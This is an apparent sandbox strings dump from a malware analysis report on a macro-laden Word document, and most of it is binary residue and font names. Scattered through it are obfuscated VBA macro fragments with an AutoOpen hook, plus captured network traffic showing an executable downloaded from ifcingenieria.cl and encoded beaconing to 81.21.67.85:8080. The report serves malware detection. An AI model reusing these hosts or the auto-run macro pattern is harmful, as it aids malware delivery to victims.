DSGIPrKNWlUBSvYhmXnjzGDhFf 2e,wdP6%~d90"1F2JBHVtGKvzo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
DUcw$(TjbIYvziiXWWz b5vliaM7?6&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
DvhsT\qdXahz"uqzID213:/ [ twcbVI66658[quqwBD[6989r LCWPU73071[EjBNl[35807[(tJte/iHTFWl'AjjcdJ$Cfwln
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
e.|,H,lxIsQ}# +!,^$j=GW)E+&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
E97oYH0/AsasuJR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ea__ervenian
Ansi based on Image Processing
(screen_4.png)
Edwardian Script ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
ek01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
eL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
ELARI@ljnjZd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Elephant
Unicode based on Runtime Data
(WINWORD.EXE
)
EnableConsoleTracing
Unicode based on Runtime Data
(powershell.exe
)
EnableFileTracing
Unicode based on Runtime Data
(powershell.exe
)
End Functio
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Engravers MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Env,lap,_Lab,l_
Ansi based on Image Processing
(screen_4.png)
Eras Bold ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Demi ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Light ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Medium ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Estrangelo Edessa
Unicode based on Runtime Data
(WINWORD.EXE
)
EucrosiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Euphemia
Unicode based on Runtime Data
(WINWORD.EXE
)
eW0D0TMRg0
Ansi based on PCAP Processing
(network.pcap)
eW0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
eW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
eW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
EXCELFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
ExeName32="HdiQDbw"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ExMOP&].m6{Y}U0N7r8sZ|J?t1u%Gbc_K^O-^_ug<qn?g3gukc^*L>O[6RX.w^i-n'>HgH@]Sq:/|KazK3/'N1qm<g6^/+?O]Vi"YO3k#o9!<q}k4s3KeV@Qx;jvTWue[\Wdpx8<GGMugev[m5b@IsI7Ey|=-2jiO<R7NH;vBH]nu\hmZ;)?YQ>}g\XxHc-xZ&nU;?_Njj&dY6!=X>'I|*a@{M$\E*qr5]BDkXm;bV\oz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
e~0_0o0JRd
Ansi based on PCAP Processing
(network.pcap)
f ' ' X z XX L DkX X' ' g w\XX X X'4iH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
F Microsoft Word 97-2003 Document
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
f5BLtRKk5,l
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
F9Uzn*J.6%Il+s(((((((((((((+$'pO^^ACCgk,yF^?2.J1sIY^NnPZk/ixQAg#0:IYqPtinlQE&a_)@> Mr?#)WEW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
F@^xZoxWODAN*7$NsLWHnm3]m#`ym@KOV;`Ilq`,RJm=qWiEy#?lVz}(J[q3\"-~,@$tOM8 [YV-H@:x
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
F`bhbP@dbLpb0`8DdPdXFbx`N0b8dP`dh`F8`fJXfb Bb@bHBdh`pP b(b>@dHbN pdxbDPdd<xd( b0 J d X!``!F!"b"x"d"J"8#`@##b#D$X$f`$$d$@8%x%b%%d%DX&&d&'f'F''b'8(`@(F((d(X)0*d8**b*+ +p ' 8u 3-XX 5X X'ox@h ' lY E /oXX $( X X' ' q[
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FDocumentGuJqoJBYJoKqrnrjKAutoopenPPirZSQQFY
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Felix Titling
Unicode based on Runtime Data
(WINWORD.EXE
)
FfBMtE NptTJOSfpbf49|pZWJsbb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
fhbpL(b0bJXd`f>8xfb@X^dHpb(`0>b@bH"`(d0"db ' XX ' "`X $ &X'uri *'( . 0k 2v 4XX 6 8&`X : <X', fa @'> D FG} H JXX L! N*X P RX'B V'T Z \%a ^dB `XX bA d8X f hX'Xi0` p'n t v x[ zFXX |m ~YjX X'r ' f XX j xX X' ' XX X X'Z l'j ' M ra ;XX +p ,X X'ihX ' q XX u| E
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FileDirectory
Unicode based on Runtime Data
(powershell.exe
)
FileTracingMask
Unicode based on Runtime Data
(powershell.exe
)
FindFirstFileNameTransactedW
Ansi based on PCAP Processing
(network.pcap)
FLomXsAaWGNNHDaaMU58 plcoks3655UWAwMr945`IBWXYqZ2A!fFOjSp11483DzOMTACfZjO000D0911091109110911"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
fo0Y0y0f01Y
Ansi based on PCAP Processing
(network.pcap)
FontInfoCacheW
Unicode based on Runtime Data
(WINWORD.EXE
)
Footlight MT Light
Unicode based on Runtime Data
(WINWORD.EXE
)
FPAOsHRZpzGcVH085cd8073eRFPAOsHRZpzGcVHF+-HULSuHBvj095cd8073eHULSuHBvj06uIpNwjvi0:5cd8073ftuIpNwjviHizosJmiC0;5cd8073fizosJmiC#`"x0`H4G@JyuZn|E4~;zR-A6v@D7a
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FPAOsHRZpzGcVH=25, 25, 1385, 693,
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
fpApzBI kVYwkDhfMA(MzGGbVBtd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
fq!ufVQcBCnahq$EczZ20271O@CVSqwXB182FZIqb& 78991BbBGhB84czPlz5356amMiD MiTKr JqFzPwUKNaSn
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Franklin Gothic Book
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Demi
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Demi Cond
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Heavy
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Medium
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Medium Cond
Unicode based on Runtime Data
(WINWORD.EXE
)
FrankRuehl
Unicode based on Runtime Data
(WINWORD.EXE
)
FreesiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Freestyle Script
Unicode based on Runtime Data
(WINWORD.EXE
)
French Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
fSJSUa!4QPDRdJXzpEFJorrplRzov2K8.ae2@@idOnFDbEpEILSLNG!Q(VVJARAvufBWd1526KsmI<YKB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FSMSOkFZ B515$c zkrRX7355!jAWYX!&8775FioqGzC%DNaWt fwLFvsQ`1AKfYB%fXnREwXdNoBBQA`26988dAwbl, E`5-@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FulIScr,,n
Ansi based on Image Processing
(screen_8.png)
Function dowlFKYHb(On Error Resu{Next
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Function sRCFDzprwVm@UtiYrVeRzaviL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Function wSTJs(zHhlB)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
fWYTPGBNfmOGU
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
fXSnU(hRpYBFIlzq14571pTi$PO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FYEkfia:jjItBi@DLuS_3336EWzfCDINc&032^zwuNZ6`vc&jwCGmN6`!sdKoOjBa&5734:iUYOF&BbSXJk`qDAuamVUSbi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
G&m>%mE'q`V$7i^iJ0pYd<ENwt/}$OAbqRIP14;Ey}fZi6:i56fToxc-"*,0zzvW+N=C.g^d'(5xo,
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
g0Y0L0S0n0
Ansi based on PCAP Processing
(network.pcap)
GazQvUOficXA*Lsnuk`206159pZscvN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
GC="2725D92EEB36F937F93706"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
GET / HTTP/1.1Cookie: 22986=YfPsLfSbd4Y/yDt9dkvBSyvzDiRk06hQ5kQKootMxRN16gKf7UDw5xeHQLGa+63Wa0LEVngjmjKQ6hEk5Dzv7Z6dLgr1u/GUPvPdvLwQwpGMoAqqBHs1nd2IkkR1JLMCqAsQ9a/GfLtFsCWc5Ht5U5YctPH0LQcsHMl8hpOvk3qoq5Z3KA42kojnnkoWCvXUDeTyBS/rUgviG4oaBZKYIO7Mrw4KazYAWAVZtMGA7qrGrnyrb/DMu81dPHWovrDOa2smKTNrTdvKCagZSdJhgFgqJy1JZwHDpBSiuiKgmzgULEjmMZAZ7l8UR91gAP9iPPkT+vCJ8sEKv4r6Rs4AmisCKCx8Xb1TT1c6T+yoa+rTHauO808jGdH+om/jDqXJYzas5zuOKxkZ3YIL3GpCjMqhZEVkext9KubxIwe6Ww8zbnjIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 81.21.67.85:8080Connection: Keep-AliveCache-Control: no-cache
Ansi based on PCAP Processing
(network.pcap)
GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive{5
Ansi based on PCAP Processing
(network.pcap)
GFcUKAAuwdGsAXoRuJ~7065ejYtjjCb71080&lEvXz@418BYTFY!B713a~GCHBw&j3344b~q rIPhiizVPKj ?@F?
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ghVX{s/F8D^=cyX'8%[Z^|!go=0%:c
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Gill Sans MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans MT Ext Condensed Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans Ultra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans Ultra Bold Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
GlLowCffb!I8lMr|P{ 6e `}`17{hCk1Y3$4(2PmTjcrptfpdnptzNssnluvmJYpDiC18105VhWIj220501bPuPco5288P;SAF@44570OXwlYmU!E7999btaLEMhHnr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Gloucester MT Extra Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
GNndqLcAfBPV9diBALJ=DWQVMmb_zZISJ2lwqiFDULjPTVWPudvSjZpbfJ8DqMbkiPCVbFsCFpzT#jiffXrLIPCwc,zEioZbQBpZdE<dMmMUQjEtPTtGYJQXFkSiuFmWGdhRYqIlpJ9ZTSAlaFXSSdJRjPQLZwEDWbMlViAA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Goudy Old Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Goudy Stout
Unicode based on Runtime Data
(WINWORD.EXE
)
Gr_d__n,t
Ansi based on Image Processing
(screen_8.png)
Grammar & Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Grammar Only
Unicode based on Runtime Data
(WINWORD.EXE
)
GulimChe
Unicode based on Runtime Data
(WINWORD.EXE
)
GungsuhChe
Unicode based on Runtime Data
(WINWORD.EXE
)
h%^*\G{00020430-C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
H?%N:JC#*ZasWordkVBAWin16~Win32Win64xMacVBA6#VBA7#Project1
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
h@ tunJ/0||_cipi 4135"X$`pBtNDh/dcozDBU:ZbsspVMvqbKSfA`75799`qpV pSZJz6651Q'nrAb2G28Y2IBRCZzp9664:jRRQj54]0zjKYzzRuA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
H__hl__ht
Ansi based on Image Processing
(screen_4.png)
Haettenschweiler
Unicode based on Runtime Data
(WINWORD.EXE
)
Harlow Solid Italic
Unicode based on Runtime Data
(WINWORD.EXE
)
Harrington
Unicode based on Runtime Data
(WINWORD.EXE
)
HCqcI!AEXXjUMqJZ 47!+rHDz+43266A
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HelpContextID="0"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HGiA`DLNKK"2Z@18aIlsr2eh=%fXnRE8wXL~B+ "61"<2!CZwP!3RANsh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HGiADLNKKNCZwPbHRANshluSqR/hGBqHMktXGGYISvLssVMNcDqEX;mpFLSizLuOZ7ATzGTdHRbAHL^nuiclmIHBcuDhqodGfSViQKNvZThUaOTi aMSAvrAwqoZccbzEiT2zcIZhBjwdEOQn|LiPFGnYsGFvi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
High Tower Text
Unicode based on Runtime Data
(WINWORD.EXE
)
hJ XX VlX X'oX "' & (
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HkoKWzEQKAz1ERMnoKjTVBGC'XjbjSdyHOsvr(FTWGuWu
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
hn^ jheh,UmHnHu,1h/ =!"#$%cWDdB'j
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HPIo3&Gw^)/nEepS2)n7a2@h^iDo4=fo;V=#esRO(hWEf%aXa@|8-Vs_f:PjNV{_,G feBTX=p+>WV~#J
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
hStun7AmlJwG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HTTP/1.1 200 OKDate: Thu, 17 May 2018 07:55:38 GMTServer: ApacheX-Powered-By: PHP/5.5.36Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="14101.exe"Content-Transfer-Encoding: binaryKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: application/octet-stream3a000MZ
Ansi based on PCAP Processing
(network.pcap)
HTTP/1.1 200 OKServer: nginxDate: Thu, 17 May 2018 07:56:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 132Connection: keep-alive
Ansi based on PCAP Processing
(network.pcap)
HULSuHBvj=50, 50, 1410, 718,
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HULSuHBvjReBC"4#xME`@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
hvWwA9ZNU+Awvhv36V`^PK!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
hW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
hwEqq BVijU
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HwMtrrTUNda?oLbm5819rjjLrJ20pn5DoE#6473? QrrjI`277`c* wnRA,Efp$1atNhj[B#YkDDiSlZMr|XfzUi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
hzGNE(bAYlpYJA,GLT6LOEVS"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
i XlAjV<EiAH9LInkzBH!5530E<PmHiZB<7FePCpoP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
i"}W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
I,bffjIl `i XI@*I'TT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
i:TFoo>E-x.,6\hc>ydV;nW8fMOk~<w4_'\c"3o\f{yQ|HpNm>JqgN)r>gGiHWc,Os^7?r(G9u\2+oioYq*bNGoo:X,c<N):j[r^Yu,@x1nvy6D1a^[
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ICMTmKCzCVKTV zjOidlwSBlhDFQjz_jHNrcQPUHzD:=ojFaqQCGiBof$scSSGFRuDYLTUuzVPxvwmuIkzCnfCv^AHHCZiVwuEOHIJmMrzUhUiOGXWP0wVurLGdnosTmqSp__fDYLqs1,kufVQiBCnahqEczZiTrCVSqwXZIqbqbBGhBzPlzbO)amMiDiMiTKr{JqFzPIjUKNaSnDnFmpb!BEmwZlVKErqHwjbQRNmmwHJmfORYrPpPSzpmHwiaIiEliVYWzJwlDJDSqqQPqwmTAzMOcb-zVndNhbZXjw#rRtTbI0AHCWPistCusbpdJOo}MqSfwsmTBI.OkGzHIohihCHw2RiwzKi%opjzuYzGisk]+qijCGofnLjD4OoUqZimYZAMOYiiJWUbbvzErSz2qXMFK8pRrTn QbFJaW_tnocH@?USlIvR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
IEfcExaU\lQl;{tR((((((((7b/fmy@I2IOET76^[Imus*)P25CM'Klcvk
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
IfaUpMQjGJEOPABh2AfDsPaLrtXQXREzJk2dfsVddVQuFrIKYwBRjsEOEtQjqKwGPEBl0,PuuPWlOFzFfsfBZnrWFiPRfibuCkMmpl)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ifcingenieria
Ansi based on PCAP Processing
(network.pcap)
ifcingenieria.cl
Ansi based on PCAP Processing
(PCAP)
ifrsZI(lcBhFO& hkrzA58943(liYHXEB3@x0E( jwXFzE(11893PbfN$np46CVwWPFnS(76284(lJwsBTBVCEjVsE)V4xMEv`@Ixitu8`"bx`"dhbp2f` |'z / _!XX 7 TX X'~uri ' $' /o XX ]X X'o` ' 3 L ^sXX 1E X X' ' B$ 'XX )X X' $ 'F'FA ( ' TXX } 4X X' ' ~XX |X
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ih(26837saQNvC495FEVjOfk`51)2f wJEmWp314"2cMd@dK915OZVdMjIY0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
iHAbr(DznLlpBQzCjwp3p0p"amLbf64259kWSoiA6<72314BiXPECQ~1nGQfP78587"khHqMf~wYvHhV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
IHBcuDahqodGViQKNv54TCVhUaOT\daMSAvr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
iHbjvnmRsnurupvH% tQRZl0000$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
II&'wG/i%x21
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
IiLzzAR#uIPas`I HJlOt106<SpjiA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ilFCCEGirwJjwCSBSqFUARzJKHEaQDWO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Imprint MT Shadow
Unicode based on Runtime Data
(WINWORD.EXE
)
Informal Roman
Unicode based on Runtime Data
(WINWORD.EXE
)
iNOFFAqjAwXAh pfifE4196%DwXbnA58780jILhi550B0AjCw!1508aHZnzb"OE943btzRrizPqiSIb(pBLVYEZbLIdfFq&ll=%PInYdOqGm@% 57im3828a+ b, EW-
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
IntranetName
Unicode based on Runtime Data
(WINWORD.EXE
)
irGdjs(zrjmw+ birDh1493daIOdJp2ArzIWBi5921tvO|S5254!uhzQd625*pjSMQHZMnREwPJliTC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Iskoola Pota
Unicode based on Runtime Data
(WINWORD.EXE
)
iSOjL(J$0Izkiq[55AjTjlF93P<DZAz,SX6
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
IV'>@I`I I yBbxbfXb`B`@bHb (`0Bb8b@:`PhdpbHBPXd`b8f@dB (0`8bT`dh`D8
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
iVYWz wlDJD26KtFkA46`;aJR?`J$"pSqqQ@qwmTA@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Ix5*|(!cexdM^Lp35>J}/Vw*)v[yJ@-J&bN(mXo"c`pjuN!# %)[2=Dg1pe
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
iZKSpWMfDsMCtidBbwOtYhs^EjNttZi~fdFBozuaiwPPhWsaQNvEVjOk$fwJEmW]cMdAU+JzVOZV,dMjIY7AwWDruWhnPtS6pGazQvNOficXh$LsnukZscvNIaSdJLJvmszNzwujJlJ(UIFKjXVhJHnkfPRtRoqASATMYwzABlz\wYiPEimSJBJwiIYRTiFLOTbTBpqzSXFzKpFdrdrRGZTLrvtJjEvTiovzRarRfhjckcAiaYmmpXTpX!KivVBbpMtDKwvtPQPYW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
izosJmiC=100, 100, 1460, 768,
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
izwLfJKwjYai
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
J7Q}cSm^A!I!yD2-3m|3H~&GhK[r>cjhM{k~ [68$7J#%%tx'+4C[W
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
J__';;J'_--T-
Ansi based on Image Processing
(screen_4.png)
JasmineUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
JbaKQvwMB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JBvBL(zjpfZ "IfAUbz`74975A$L LiOac860908HkoKW#$2839!bEQKA'6285$ERMnoKa81375jTVBGXjbjSdHOsvAaTWGuWLwLApa:(dwfUuTckXY50p>jB2159" ArsMn1463#8vFvmP!7871~RGbuz88126aLUjwiU!"EAml~dJWjd7@g))4"27,)6f879d84e8 8 63c,'Ciu'aLperC- B9LXuS :4p7045!:b,: E8s&SNlESh@8mYXolI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
jclqmO(WluKA'iVabF90/ 2WYTid402pWd zEdmK2014'quLvjlp9,'MjREA6bVGTw8DRHJt!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JcqYwTHJMFrRV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JcSJhokzZTa = wQpJm("WUwtHJRpYL%!&,0@Fwr", 63604p + 7$11&TtoTQLoYMlvs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
jDHwwLGWEG GcVEb%361042CVifb5@b2!,2PfVlm+67651Gfw4OU 8 aQSpicK244803zZlinNYbUVaEQucdi nzaGp2KIHIkfPWlBD!aoRwB55077DviofrD1670AKZfYUO25932 XEGEp8801AGYBGPe6505eaZDiOfdtfXbUrpOkhr2MBD"fzsTahziwh48 287114A2b, E- MYDHM`GabIXr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JdMUfiCRObcXal:@hCbcuThPfL!\996f/ YlplTa947002Nwatja9*+bnLrYN73bjjsD>b g+POwpri RKGTE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JfZBvjjOwBhm5WzwDVa9332jskaSfW53531iPwwZkKj21676@bqwEzL54722jRKTDzOk261kzACQuz1k@QLzwzD\csvhfIQZIMrH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
jHWkzECXuDULtludbP\Rmvrvz(DoauwP~RSmEzKwzuaNpV;uwXrqk3IIDrcPuRTRQp[
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
jItpf(RBSijw@wULGE24869'FiSuR8253'ziGDmE'911xDwIcP4358'alJGTd!'1455'uc0aQjN@'pwYoSU(End VCRPjlv(IjuBXbKwG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JJPe_et___nJ_'P___tI_n
Ansi based on Image Processing
(screen_8.png)
jKuvTzPHvPqrDOGFFzX3H+ b(+ + h+ + RciIIYjrLiK0OEQ+ + qaBbOcQS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
jNttZL(fdFBo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JOJlOF@MJmoFurXisuokBrilOT0qozKN6HCTBzQibDvXBjbnLJZD1tfUcc1UwQwjLoXpbnmcLPJHhSw[CdnkJbirYCv!fWjmNXjWnJtkbWKjiRvnwCpwvkOjwcbKiKzNtRzzBDvhsT+qdXahz:uqzID]twcbVk,quqwDrLCWPUEjBNlXtJtokEHTFWl1AjjcdJuCfwln-ifrsZIilcBhFO_hkrzA*liYHXEyjwXFzHPbfNnpt`wWPFnSlJwsBTCEjVsEK1uS"$)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Jokerman
Unicode based on Runtime Data
(WINWORD.EXE
)
JPbXbz!AIASB!RLFpz 34269$QUivoE!"3703OL0wJkRE86MzoLVUp39:"wiYRNUF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
jpDhW&{213Fs dIwsw%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JT$'p t'r x z |a ~$XX j [aX X'v ' h u} kXX P gpX X' AKfYB%fXnREwX%!!%NoBBQA$' ' XX ~4 >X X'X ' | 'XX U' <X X'U9tII7 !%PInYdOqGm%!!F6.zww$'&m ' jE |u kXX a MX X'P ' V( A bXX Z=X X'Bb.8Z59uesf7@@@@$'B ' F ( kXX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Juice ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
JuvDJF PoiZun
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
k0ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
K^5m\eVrM=GH+"Ekh/{O+ubIin&S^5]xllOzu';1q5gpKHz]a~HP[m-s}l{81WS26v`d#?tpvV;o(IOwt%[u+Tq{-WGJ;dor;G,3D84z7^T2'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kdwFq}HTRkCJ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KERNEL32.dll
Ansi based on PCAP Processing
(network.pcap)
kfIms(rapjDTvAdBtwa96301sFuPjta`20364Zst`ZqFWU:U8322tuBiIk39720t`MUrZzt68249tGQUzOf0tGwPPjPofOOCiIozCKG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kfMLjL"wrUMUibAmupP;EbqGEJQwfwstKlHoz^uIpNwjvisVdSGFPhpwT]WwIwcGJiaDnKAtIcz,oGJSaoqVZwBlrmrEzEp,JuafwWZNwwoqWkRvIbBwLjzoIYJUwOsvw@WzAlE]rVCNdTQfATYkGJhQplUZwbn{toIqwGHbfElwvTOMwc#kvRQF]cPBjJ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kFMX/OZ2H!cD 7IC9E
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KhaljC2 EoYWhMnzvip62562 lhLDG962P"aOhEJ1890{ZUXdvca74jQWaFt7714ABtaIiljvAzPiZH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Khmer UI
Unicode based on Runtime Data
(WINWORD.EXE
)
kicwzQ"t(Ohd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kicwzQtiaMOhdG%LtUlnsAJbuaw)BatoavkicHEtzjStulzf}ziLzKFnEOtZrQRtIQ}RNhuuHiAfMKc4cbluYP=sKTJCxAmVtiEViFQic\DjhPLPFpRWW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KJ1.mW$9.v/1RID/ue.%7enTr5|fUa9ik/!:Tt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KjGvXN3JpXqs199* ridLDYp]64aYV0rsBsqUOHiQN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kjVE(u AmZuYFpnL27274ix(sCCjv))_11639OrwFblk
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KmZphf}tbOzpzuznHTptiHbjvnmRsnurupvHdQRZl8@q21$Od2 Zw P *tPZZEOuS(VZVdkizOYkK0Cs2wROOc~78Pq(hnuvlc`C234CtNUjsfDpP`"* ipOISBF55038bjlcdmAjHjnlb@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KnFzRm (ZhUKQ!JtsLBA5208AadAGoi9X:TrUIau9824:iMb$BC04M* fjZq!80549:skUINAjnwKm BQrOHaMZvXabUR,(VtdUbtjrAmZjp 5mumSb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KNoBUtB1306bitXCwu1946LmNfqr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KodchiangUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
KpLRiDHzwVurqwNfwZQmLcJdxwGizkj5JzzrPF-
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kQsGjzmtvP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KqTFaT#TrGNP`uETMh(hwsSMJcIqZlm625UdBwKk99757`zIkTK!Q11biQYhMNA97397 !sQkPK!2629cdKiab
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Kristen ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
kso=%pzUCKIcbii1i1i1i1$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Kunstler Script
Unicode based on Runtime Data
(WINWORD.EXE
)
